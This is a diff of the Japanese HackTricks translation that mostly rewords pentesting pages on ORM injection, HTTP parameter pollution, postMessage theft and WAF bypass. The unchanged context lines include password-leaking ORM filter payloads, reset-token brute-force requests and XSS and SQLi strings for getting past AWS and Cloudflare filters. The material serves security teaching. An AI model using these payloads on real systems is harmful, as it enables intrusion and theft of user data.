 - `request_uris`を介した直接的な悪用はホワイトリスト制御によって軽減される可能性がありますが、事前に登録された攻撃者が制御する`request_uri`を提供することで、認可フェーズ中にSSRFを促進することができます。
 
-## OAuthプロバイダーのレースコンディション
+## OAuth providers Race Conditions
 
-テストしているプラットフォームがOAuthプロバイダーである場合、[**レースコンディションの可能性をテストするためにこれを読んでください**](race-condition.md)。
+テストしているプラットフォームがOAuthプロバイダーである場合、[**レース条件の可能性をテストするためにこれを読んでください**](race-condition.md)。
 
-## 参考文献
+## References
 
 - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
 - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
 
+
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/orm-injection.md b/src/pentesting-web/orm-injection.md
index 1b1b91711..f4c8b79bc 100644
--- a/src/pentesting-web/orm-injection.md
+++ b/src/pentesting-web/orm-injection.md
@@ -4,7 +4,7 @@
 
 ## Django ORM (Python)
 
-In [**this post**](https://www.elttam.com/blog/plormbing-your-django-orm/) は、Django ORMを脆弱にする方法が説明されています。例えば、次のようなコードを使用することができます。
+In [**this post**](https://www.elttam.com/blog/plormbing-your-django-orm/) は、Django ORMを脆弱にする方法が説明されています。例えば、次のようなコードを使用することができます：
 
 <pre class="language-python"><code class="lang-python">class ArticleView(APIView):
 """
@@ -21,9 +21,9 @@ return Response(serializer.data)
 
 すべてのrequest.data（これはjsonになります）が**データベースからオブジェクトをフィルタリングするために**直接渡されることに注意してください。攻撃者は予期しないフィルタを送信することで、期待以上のデータを漏洩させることができます。
 
-例:
+例：
 
-- **ログイン:** 簡単なログインで、登録されているユーザーのパスワードを漏洩させようとします。
+- **ログイン：** 簡単なログインで、登録されているユーザーのパスワードを漏洩させようとします。
 ```json
 {
 "username": "admin",
@@ -33,7 +33,7 @@ return Response(serializer.data)
 > [!CAUTION]
 > パスワードをブルートフォースして漏洩させることが可能です。
 
-- **リレーショナルフィルタリング**: 操作で使用されることすら予期されていなかったカラムから情報を漏洩させるために、リレーションを横断することが可能です。例えば、次のリレーションを持つユーザーによって作成された記事を漏洩させることが可能な場合です: Article(`created_by`) -\[1..1]-> Author (`user`) -\[1..1]-> User(`password`).
+- **リレーショナルフィルタリング**: 操作に使用されることすら予想されていなかった列から情報を漏洩させるために、リレーションを横断することが可能です。例えば、次のリレーションを持つユーザーによって作成された記事を漏洩させることが可能な場合です: Article(`created_by`) -\[1..1]-> Author (`user`) -\[1..1]-> User(`password`).
 ```json
 {
 "created_by__user__password__contains": "pass"
@@ -51,7 +51,7 @@ return Response(serializer.data)
 > [!CAUTION]
 > この場合、記事を作成したユーザーの部門にいるすべてのユーザーを見つけ、その後にパスワードを漏洩させることができます（前のjsonではユーザー名を漏洩させているだけですが、その後にパスワードを漏洩させることが可能です）。
 
-- **Djangoのグループと権限の多対多関係を悪用する**: さらに、AbstractUserモデルはDjangoでユーザーを生成するために使用され、デフォルトでこのモデルには**PermissionおよびGroupテーブルとの多対多関係**があります。これは基本的に、**同じグループにいるか、同じ権限を共有している場合に、1人のユーザーから他のユーザーにアクセスする**ためのデフォルトの方法です。
+- **Djangoのグループと権限の多対多関係を悪用する**: さらに、AbstractUserモデルはDjangoでユーザーを生成するために使用され、デフォルトではこのモデルには**PermissionおよびGroupテーブルとの多対多関係**があります。これは基本的に、**同じグループにいるか、同じ権限を共有している場合に、1人のユーザーから他のユーザーにアクセスするためのデフォルトの方法**です。
 ```bash
 # By users in the same group
 created_by__user__groups__user__password
@@ -201,7 +201,7 @@ res.json([])
 }
 })
 ```
-未公開の記事を漏洩させることは、`Category` -\[\*..\*]-> `Article` の多対多の関係を利用することで可能です：
+`Category` -\[\*..\*]-> `Article` の多対多の関係を利用して、未発表の記事を漏洩させることが可能です。
 ```json
 {
 "query": {
@@ -220,7 +220,7 @@ res.json([])
 }
 }
 ```
-すべてのユーザーを漏洩させることも可能であり、いくつかのループバック多対多関係を悪用します:
+ループバックの多対多関係を悪用することで、すべてのユーザーを漏洩させることも可能です:
 ```json
 {
 "query": {
@@ -267,7 +267,7 @@ res.json([])
 ]
 }
 ```
-`{CONTAINS_LIST}`は、**正しい漏洩が見つかったときに応答が遅延することを確認するための1000の文字列のリストです。**
+`{CONTAINS_LIST}`は、**正しいリークが見つかったときに応答が遅延することを確認するための1000の文字列のリストです。**
 
 ## **Ransack (Ruby)**
 
@@ -283,7 +283,7 @@ def index
 @posts = @q.result(distinct: true)
 end
 ```
-攻撃者によって送信されたパラメータによってクエリがどのように定義されるかに注意してください。例えば、リセットトークンをブルートフォースすることが可能でした:
+攻撃者によって送信されたパラメータによってクエリがどのように定義されるかに注意してください。例えば、次のようにリセットトークンをブルートフォースすることが可能でした：
 ```http
 GET /posts?q[user_reset_password_token_start]=0
 GET /posts?q[user_reset_password_token_start]=1
diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md
index afd5c15bd..a5fbceccc 100644
--- a/src/pentesting-web/parameter-pollution.md
+++ b/src/pentesting-web/parameter-pollution.md
@@ -10,11 +10,11 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 
 ### HTTPパラメータ汚染 (HPP) の例
 
-銀行アプリケーションの取引URL：
+銀行アプリケーションの取引URL:
 
 - **元のURL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
 
-追加の`from`パラメータを挿入することによって：
+追加の`from`パラメータを挿入することによって:
 
 - **操作されたURL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
 
@@ -22,12 +22,12 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 
 #### **技術特有のパラメータ解析**
 
-- パラメータが解析され、優先される方法は、基盤となるウェブ技術によって異なり、HPPがどのように悪用されるかに影響します。
+- パラメータが解析され、優先される方法は、基盤となるウェブ技術によって異なり、HPPがどのように悪用されるかに影響を与えます。
 - [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) のようなツールは、これらの技術とその解析動作を特定するのに役立ちます。
 
 ### PHPとHPPの悪用
 
-**OTP操作ケース：**
+**OTP操作ケース:**
 
 - **コンテキスト:** ワンタイムパスワード (OTP) を必要とするログインメカニズムが悪用されました。
 - **方法:** Burp Suiteのようなツールを使用してOTPリクエストを傍受し、攻撃者はHTTPリクエスト内の`email`パラメータを複製しました。
@@ -35,9 +35,9 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 
 このシナリオは、OTP生成のために最初の`email`パラメータを処理したが、配信には最後のものを使用したアプリケーションのバックエンドの重大な見落としを強調しています。
 
-**APIキー操作ケース：**
+**APIキー操作ケース:**
 
-- **シナリオ:** アプリケーションはユーザーがプロフィール設定ページを通じてAPIキーを更新できるようにしています。
+- **シナリオ:** アプリケーションは、ユーザーがプロフィール設定ページを通じてAPIキーを更新できるようにしています。
 - **攻撃ベクトル:** 攻撃者は、POSTリクエストに追加の`api_key`パラメータを追加することで、APIキー更新機能の結果を操作できることを発見しました。
 - **技術:** Burp Suiteのようなツールを利用して、攻撃者は1つの正当な`api_key`パラメータと1つの悪意のある`api_key`パラメータを含むリクエストを作成します。サーバーは最後の出現のみを処理し、攻撃者が提供した値にAPIキーを更新します。
 - **結果:** 攻撃者は被害者のAPI機能を制御し、プライベートデータに不正にアクセスまたは変更する可能性があります。
@@ -46,14 +46,14 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 
 ### パラメータ解析: Flask vs. PHP
 
-ウェブ技術が重複したHTTPパラメータを処理する方法は異なり、HPP攻撃に対する脆弱性に影響を与えます：
+ウェブ技術が重複したHTTPパラメータを処理する方法は異なり、HPP攻撃に対する脆弱性に影響を与えます:
 
-- **Flask:** クエリ文字列`a=1&a=2`のように、最初に遭遇したパラメータ値を採用し、初期のインスタンスを後続の重複より優先します。
+- **Flask:** クエリ文字列`a=1&a=2`のように、最初に遭遇したパラメータ値を採用し、初期のインスタンスを後続の重複よりも優先します。
 - **PHP (Apache HTTPサーバー上):** 逆に、最後のパラメータ値を優先し、与えられた例では`a=2`を選択します。この動作は、攻撃者が操作したパラメータを元のものよりも優先することによって、HPPの悪用を無意識に助長する可能性があります。
 
 ## 技術によるパラメータ汚染
 
-結果は [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89) から取得されました。
+結果は[https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)から取得されました。
 
 ### PHP 8.3.11 および Apache 2.4.62 <a href="#id-9523" id="id-9523"></a>
 
@@ -79,7 +79,7 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 1. POST RequestMapping == PostMapping & GET RequestMapping == GetMapping。
 2. POST RequestMapping & PostMappingはname\[]を認識します。
 3. nameとname\[]が存在する場合はnameを優先します。
-4. パラメータを連結します（例：first,last）。
+4. パラメータを連結します。例: first,last。
 5. POST RequestMapping & PostMappingはContent-Typeを持つクエリパラメータを認識します。
 
 ### **NodeJS** 20.17.0 **および** Express 4.21.0 <a href="#id-6d72" id="id-6d72"></a>
@@ -87,7 +87,7 @@ HTTPパラメータ汚染 (HPP) は、攻撃者がHTTPパラメータを操作
 <figure><img src="../images/image (1259).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg</a></p></figcaption></figure>
 
 1. name\[]を認識します。
-2. パラメータを連結します（例：first,last）。
+2. パラメータを連結します。例: first,last。
 
 ### GO 1.22.7 <a href="#id-63dc" id="id-63dc"></a>
 
diff --git a/src/pentesting-web/phone-number-injections.md b/src/pentesting-web/phone-number-injections.md
index d77f228cd..5ae3288c7 100644
--- a/src/pentesting-web/phone-number-injections.md
+++ b/src/pentesting-web/phone-number-injections.md
@@ -2,7 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-電話番号の**末尾に文字列を追加する**ことが可能で、これを利用して一般的なインジェクション（XSS、SQLi、SSRF...）を悪用したり、保護を回避したりすることができます：
+電話番号の**末尾に文字列を追加する**ことが可能で、これにより一般的なインジェクション（XSS、SQLi、SSRF...）を悪用したり、保護を回避したりすることができます：
 
 <figure><img src="../images/image (461).png" alt="https://www.youtube.com/watch?app=desktop\&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index 4b502e6c4..10888bd91 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -5,10 +5,10 @@
 これらのPoCとポリグロスの目的は、テスターに**応答に何らかの形で反映される入力**を利用して悪用できる脆弱性の迅速な**概要**を提供することです。
 
 > [!WARNING]
-> この**チートシートは各脆弱性のテストの包括的なリストを提案していません**、基本的なもののみです。より包括的なテストを探している場合は、提案された各脆弱性にアクセスしてください。
+> この**チートシートは各脆弱性の包括的なテストリストを提案していません**、基本的なものだけです。より包括的なテストを探している場合は、提案された各脆弱性にアクセスしてください。
 
 > [!CAUTION]
-> **XXEのようなContent-Type依存のインジェクションは見つかりません**、通常、xmlデータを送信するリクエストを見つけた場合は自分で試すことになります。また、**データベースインジェクションもここには見つかりません**、反映される可能性のあるコンテンツがあっても、バックエンドDB技術と構造に大きく依存します。
+> **XXEのようなContent-Type依存のインジェクションは見つかりません**、通常、XMLデータを送信するリクエストを見つけた場合は自分で試すことになります。また、**データベースインジェクションもここには見つかりません**、いくつかのコンテンツが反映される可能性があっても、それはバックエンドDB技術と構造に大きく依存します。
 
 ## Polygloths list
 ```python
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md
index dd112d37c..72bc34a18 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/README.md
@@ -39,7 +39,7 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
 ### iframe と **targetOrigin** のワイルドカードを攻撃する
 
 [**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**iframed** 可能なページ（`X-Frame-Header` 保護なし）を見つけ、**ワイルドカード**（\*）を使用して **postMessage** 経由で **機密** メッセージを **送信している** 場合、**iframe** の **origin** を **変更** し、**機密** メッセージをあなたが制御するドメインに **漏洩** させることができます。\
-ページが iframed 可能であるが、**targetOrigin** が **URL に設定されていてワイルドカードではない**場合、この **トリックは機能しません**。
+ページが iframed 可能であるが、**targetOrigin** が **ワイルドカードではなく URL に設定されている** 場合、この **トリックは機能しません**。
 ```markup
 <html>
 <iframe src="https://docs.google.com/document/ID" />
@@ -167,7 +167,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
 ```
 ### 子に送信されたメッセージをメインページをブロックして盗む
 
-次のページでは、データを送信する前にメインページを**ブロック**し、子の**XSS**を悪用してデータを受信する前に**漏洩**させることで、**子iframe**に送信された**敏感なpostmessageデータ**をどのように盗むことができるかを示しています：
+次のページでは、データを送信する前に**メイン**ページを**ブロック**し、**子**の**XSS**を悪用して**データを漏洩**させることで、**子iframe**に送信された**敏感なpostmessageデータ**をどのように盗むことができるかを示しています：
 
 {{#ref}}
 blocking-main-page-to-steal-postmessage.md
@@ -175,7 +175,7 @@ blocking-main-page-to-steal-postmessage.md
 
 ### iframeの位置を変更してメッセージを盗む
 
-X-Frame-Headerがないウェブページをiframeできる場合、別のiframeを含む場合、その子iframeの**位置を変更**することができます。もしそれが**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジン**を自分が**制御**するページに**変更**し、メッセージを**盗む**ことができます：
+X-Frame-Headerがないウェブページをiframeできる場合、別のiframeを含む場合、その**子iframeの位置を変更**することができます。もしそれが**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジン**を自分が**制御**するページに**変更**し、メッセージを**盗む**ことができます：
 
 {{#ref}}
 steal-postmessage-modifying-iframe-location.md
diff --git a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
index 8e423b3fd..24b9f7448 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
@@ -4,15 +4,15 @@
 
 ## Winning RCs with Iframes
 
-この[**Terjanqの解説**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710)によると、null originから作成されたblobドキュメントはセキュリティ上の利点のために隔離されており、つまり、メインページを忙しく保つと、iframeページが実行されることになります。
+According to this [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) blob documents created from null origins are isolated for security benefits, which means that if you maintain busy the main page, the iframe page is going to be executed.
 
-基本的に、このチャレンジでは**隔離されたiframeが実行され**、その**読み込み**の**直後**に**親**ページが**フラグ**を含む**post**メッセージを**送信**します。\
+基本的に、このチャレンジでは、**孤立したiframeが実行され**、その**読み込み**の**直後**に**親**ページが**フラグ**を含む**ポスト**メッセージを**送信**します。\
 しかし、そのpostmessage通信は**XSSに脆弱**です（**iframe**はJSコードを実行できます）。
 
-したがって、攻撃者の目標は**親にiframeを作成させる**ことですが、**親**ページが**機密データ（**フラグ**）を**送信**する**前に**、それを**忙しく保ち**、**payloadをiframeに送信**することです。**親が忙しい間**、**iframeはpayloadを実行**し、これは**親のpostmessageメッセージをリッスンし、フラグを漏洩させる**JSになります。\
-最終的に、iframeはpayloadを実行し、親ページは忙しさをやめるので、フラグを送信し、payloadがそれを漏洩させます。
+したがって、攻撃者の目標は、**親がiframeを作成させる**ことですが、**親**ページが**機密データ（**フラグ**）を**送信**する前に**それを**忙しく**させ、**ペイロードをiframeに送信**することです。**親が忙しい間**、**iframeはペイロードを実行**し、**親のpostmessageメッセージをリッスンしてフラグを漏洩**します。\
+最終的に、iframeはペイロードを実行し、親ページは忙しさをやめるので、フラグを送信し、ペイロードがそれを漏洩します。
 
-では、どのようにして親を**iframeを生成した直後に忙しくさせ、機密データを送信するためにiframeが準備できるのを待っている間だけ忙しくさせることができるでしょうか？** 基本的に、親に**実行**させることができる**非同期**の**アクション**を見つける必要があります。例えば、このチャレンジでは親がこのように**postmessages**を**リッスン**していました：
+しかし、親が**iframeを生成した直後に、機密データを送信するためにiframeが準備できるのを待っている間、どのように忙しくさせることができるでしょうか？** 基本的に、**親が実行**できる**非同期**の**アクション**を見つける必要があります。例えば、このチャレンジでは、親はこのように**postmessages**を**リッスン**していました：
 ```javascript
 window.addEventListener("message", (e) => {
 if (e.data == "blob loaded") {
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
index 70b805629..3572b5c4d 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
@@ -21,7 +21,7 @@ renderContainer.innerHTML = data.body
 
 ### SOPバイパス 1 (e.origin === null)
 
-`//example.org`が**サンドボックス化されたiframe**に埋め込まれると、ページの**オリジン**は**`null`**になります。つまり、**`window.origin === null`**です。したがって、`<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">`を介してiframeを埋め込むだけで、**`null`オリジンを強制**できます。
+`//example.org`が**サンドボックス化されたiframe**に埋め込まれると、ページの**オリジン**は**`null`**になります。つまり、**`window.origin === null`**です。したがって、`<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">`を介してiframeを埋め込むだけで、**`null`オリジンを強制**することができます。
 
 ページが**埋め込み可能**であれば、その方法でその保護をバイパスできます（クッキーも`SameSite=None`に設定する必要があるかもしれません）。
 
@@ -34,7 +34,7 @@ renderContainer.innerHTML = data.body
 
 したがって、このチャレンジのために、**iframeを作成**し、脆弱なXSSコードハンドラー（`/iframe.php`）を持つページに**ポップアップを開く**ことができます。`window.origin === e.origin`のため、両方が`null`であるため、**XSSを悪用するペイロードを送信**することが可能です。
 
-その**ペイロード**は**識別子**を取得し、**XSS**を**トップページ**（ポップアップを開いたページ）に**戻します**。**そのページは**、**脆弱な**`/iframe.php`に**ロケーションを変更**します。識別子が知られているため、条件`window.origin === e.origin`が満たされないことは問題ではありません（オリジンは**オリジン**が**`null`**のiframeからの**ポップアップ**です）なぜなら、`data.identifier === identifier`だからです。次に、**XSSが再びトリガーされます**。今度は正しいオリジンで。
+その**ペイロード**は**識別子**を取得し、**XSS**を**トップページ**（ポップアップを開いたページ）に**戻します**。**そのページは**、**脆弱な**`/iframe.php`に**ロケーションを変更**します。識別子が知られているため、`window.origin === e.origin`の条件が満たされないことは問題ではありません（オリジンは**オリジン**が**`null`**のiframeからの**ポップアップ**です）なぜなら、`data.identifier === identifier`だからです。次に、**XSSが再びトリガーされます**。今度は正しいオリジンで。
 ```html
 <body>
 <script>
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
index 4888a0207..1249fd252 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
@@ -16,7 +16,7 @@ if (e.source == window.calc.contentWindow && e.data.token == window.token) {
 
 - **`window.calc.contentWindow`**は実際には**`document.getElementById("calc")`**です。あなたは**`document.getElementById`**を**`<img name=getElementById />`**でクラッシャーできます（サニタイザーAPI -[こちら](https://wicg.github.io/sanitizer-api/#dom-clobbering)-は、デフォルトの状態ではDOMクラッシャー攻撃から保護するように設定されていません）。
 - したがって、あなたは**`document.getElementById("calc")`**を**`<img name=getElementById /><div id=calc></div>`**でクラッシャーできます。そうすると、**`window.calc`**は**`undefined`**になります。
-- さて、**`e.source`**を**`undefined`**または**`null`**にする必要があります（なぜなら`==`が使用されているため、**`null == undefined`**は**`True`**です）。これを得るのは「簡単」です。**iframe**を作成し、そこから**postMessage**を送信し、すぐに**iframe**を**削除**すれば、**`e.origin`**は**`null`**になります。次のコードを確認してください。
+- さて、**`e.source`**を**`undefined`**または**`null`**にする必要があります（なぜなら`==`が使用されているため、**`null == undefined`**は**`True`**です）。これを得るのは「簡単」です。**iframe**を作成し、そこから**postMessage**を送信し、すぐにiframeを**削除**すれば、**`e.origin`**は**`null`**になります。次のコードを確認してください。
 ```javascript
 let iframe = document.createElement("iframe")
 document.body.appendChild(iframe)
@@ -28,7 +28,7 @@ document.body.removeChild(iframe) //e.origin === null
 **二回目のチェック**をバイパスするためには、**`token`**を値`null`で送信し、**`window.token`**の値を**`undefined`**にすることです：
 
 - 値`null`でpostMessageに`token`を送信するのは簡単です。
-- **`window.token`**は、**`document.cookie`**を使用する関数**`getCookie`**を呼び出す際に使用されます。**`null`**オリジンのページで**`document.cookie`**にアクセスすると**エラー**が発生することに注意してください。これにより、**`window.token`**は**`undefined`**の値になります。
+- **`window.token`**は、**`document.cookie`**を使用する**`getCookie`**関数を呼び出す際に使用されます。**`null`**オリジンページでの**`document.cookie`**へのアクセスは**エラー**を引き起こすことに注意してください。これにより、**`window.token`**は**`undefined`**の値になります。
 
 最終的な解決策は[**@terjanq**](https://twitter.com/terjanq)によるもので、[**以下**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html)です：
 ```html
diff --git a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
index 1efb65e8a..9e0717fe3 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
@@ -4,11 +4,11 @@
 
 ## 子iframeの位置を変更する
 
-[**この書き込み**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)によると、X-Frame-Headerがないウェブページをiframe化できる場合、別のiframeを含む場合、その**子iframeの位置を変更する**ことができます。
+[**この書き込み**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)によると、X-Frame-Headerがないウェブページをiframeにでき、その中に別のiframeが含まれている場合、**その子iframeの位置を変更することができます**。
 
 例えば、abc.comがefg.comをiframeとして持ち、abc.comにX-Frameヘッダーがない場合、**`frames.location`**を使用してefg.comをevil.comにクロスオリジンで変更することができます。
 
-これは特に**postMessages**で有用です。なぜなら、ページが**ワイルドカード**を使用して機密データを送信している場合、`windowRef.postmessage("","*")`、攻撃者が制御する位置に関連するiframe（子または親）の**位置を変更する**ことが可能で、そのデータを盗むことができます。
+これは特に**postMessages**で有用です。なぜなら、ページが**ワイルドカード**を使用して機密データを送信している場合、例えば`windowRef.postmessage("","*")`のように、**関連するiframe（子または親）の位置を攻撃者が制御する場所に変更し、そのデータを盗むことが可能です**。
 ```html
 <html>
 <iframe src="https://docs.google.com/document/ID" />
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index 22f23b057..14c2aa004 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -5,7 +5,7 @@
 
 ## パス名操作による Nginx ACL ルールのバイパス <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
 
-技術 [この研究から](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
+この研究からの技術 [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
 
 Nginx ルールの例:
 ```plaintext
@@ -64,7 +64,7 @@ fastcgi_pass unix:/run/php/php8.1-fpm.sock;
 ```
 Nginxは`/admin.php`へのアクセスをブロックするように設定されていますが、`/admin.php/index.php`にアクセスすることでこれをバイパスすることが可能です。
 
-### 予防策
+### 予防方法
 ```plaintext
 location ~* ^/admin {
 deny all;
@@ -75,7 +75,7 @@ deny all;
 ### パスの混乱
 
 [**この投稿**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)では、ModSecurity v3（3.0.12まで）が、アクセスされたパス（パラメータの開始まで）を含むはずの`REQUEST_FILENAME`変数を**不適切に実装していた**ことが説明されています。これは、パスを取得するためにURLデコードを行ったためです。\
-したがって、mod securityでは`http://example.com/foo%3f';alert(1);foo=`のようなリクエストは、`%3f`が`?`に変換されてURLパスが終了するため、パスは単に`/foo`であると見なされますが、実際にサーバーが受け取るパスは`/foo%3f';alert(1);foo=`になります。
+したがって、`http://example.com/foo%3f';alert(1);foo=`のようなリクエストは、mod securityではパスが単に`/foo`であると見なされます。なぜなら、`%3f`が`?`に変換されてURLパスが終了するからですが、実際にサーバーが受け取るパスは`/foo%3f';alert(1);foo=`になります。
 
 `REQUEST_BASENAME`および`PATH_INFO`変数もこのバグの影響を受けました。
 
@@ -85,7 +85,7 @@ Mod Securityのバージョン2でも同様のことが発生し、特定の拡
 
 ### 不正なヘッダー
 
-[この研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)では、AWSが適用したHTTPヘッダーに対するWAFルールをバイパスするために、AWSによって適切に解析されなかった「不正な」ヘッダーを送信することが可能であったことが言及されていますが、バックエンドサーバーによっては解析されました。
+[この研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)では、AWSが適用したHTTPヘッダーに対するWAFルールを、不正に解析されたヘッダーを送信することでバイパスすることが可能であったと述べています。このヘッダーはAWSによって適切に解析されませんでしたが、バックエンドサーバーによっては解析されました。
 
 例えば、ヘッダーX-QueryにSQLインジェクションを含む以下のリクエストを送信することです：
 ```http
@@ -147,7 +147,7 @@ Unicode 正規化の実装によって（詳細は [こちら](https://jlajara.g
 
 例えば、記事では**Akamaiがユーザー入力を10回デコードした**と述べられています。したがって、`<input/%2525252525252525253e/onfocus`のようなものは、Akamaiには`<input/>/onfocus`として見え、**タグが閉じているため問題ないと考えるかもしれません**。しかし、アプリケーションが入力を10回URLデコードしない限り、被害者は`<input/%25252525252525253e/onfocus`のようなものを見ることになり、**これはXSS攻撃に対して依然として有効です**。
 
-したがって、これは**WAFがデコードして解釈するエンコードされたコンポーネントにペイロードを隠すことを可能にします**が、被害者はそれを見ません。
+したがって、これは**WAFがデコードして解釈するエンコードされたコンポーネントにペイロードを隠すことを可能にします**が、被害者はそれを認識しません。
 
 さらに、これはURLエンコードされたペイロードだけでなく、unicode、hex、octalなどの他のエンコーディングでも行うことができます。
 
@@ -158,11 +158,11 @@ Unicode 正規化の実装によって（詳細は [こちら](https://jlajara.g
 - AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
 - Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`
 
-また、**一部のWAFがユーザー入力のコンテキストをどのように理解するかによって**、それを悪用することが可能であることも述べられています。ブログで提案された例は、Akamaiが`/*`と`*/`の間に何でも入れることを許可していることです（これは一般的にコメントとして使用されるため、潜在的に）。したがって、`/*'or sleep(5)-- -*/`のようなSQLインジェクションはキャッチされず、`/*`がインジェクションの開始文字列であり、`*/`がコメントされているため有効です。
+また、**いくつかのWAFがユーザー入力のコンテキストをどのように理解するかによって**、それを悪用することが可能であることも述べられています。ブログで提案された例は、Akamaiが`/*`と`*/`の間に何でも入れることを許可していることです（これは一般的にコメントとして使用されるため、潜在的に）。したがって、`/*'or sleep(5)-- -*/`のようなSQLインジェクションはキャッチされず、`/*`がインジェクションの開始文字列であり、`*/`がコメントされているため有効です。
 
 このようなコンテキストの問題は、WAFによって悪用されることが期待される脆弱性以外の**他の脆弱性を悪用するためにも使用できます**（例えば、これを使用してXSSを悪用することも可能です）。
 
-### H2Cスムギング <a href="#ip-rotation" id="ip-rotation"></a>
+### H2Cスモグリング <a href="#ip-rotation" id="ip-rotation"></a>
 
 {{#ref}}
 h2c-smuggling.md
@@ -178,7 +178,7 @@ h2c-smuggling.md
 
 ### 正規表現バイパス
 
-ファイアウォールの正規表現フィルターをバイパスするためにさまざまな技術が使用できます。例としては、大文字と小文字の交互、改行の追加、ペイロードのエンコーディングなどがあります。さまざまなバイパスのリソースは[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)や[OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)で見つけることができます。以下の例は[この記事](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)から引用されています。
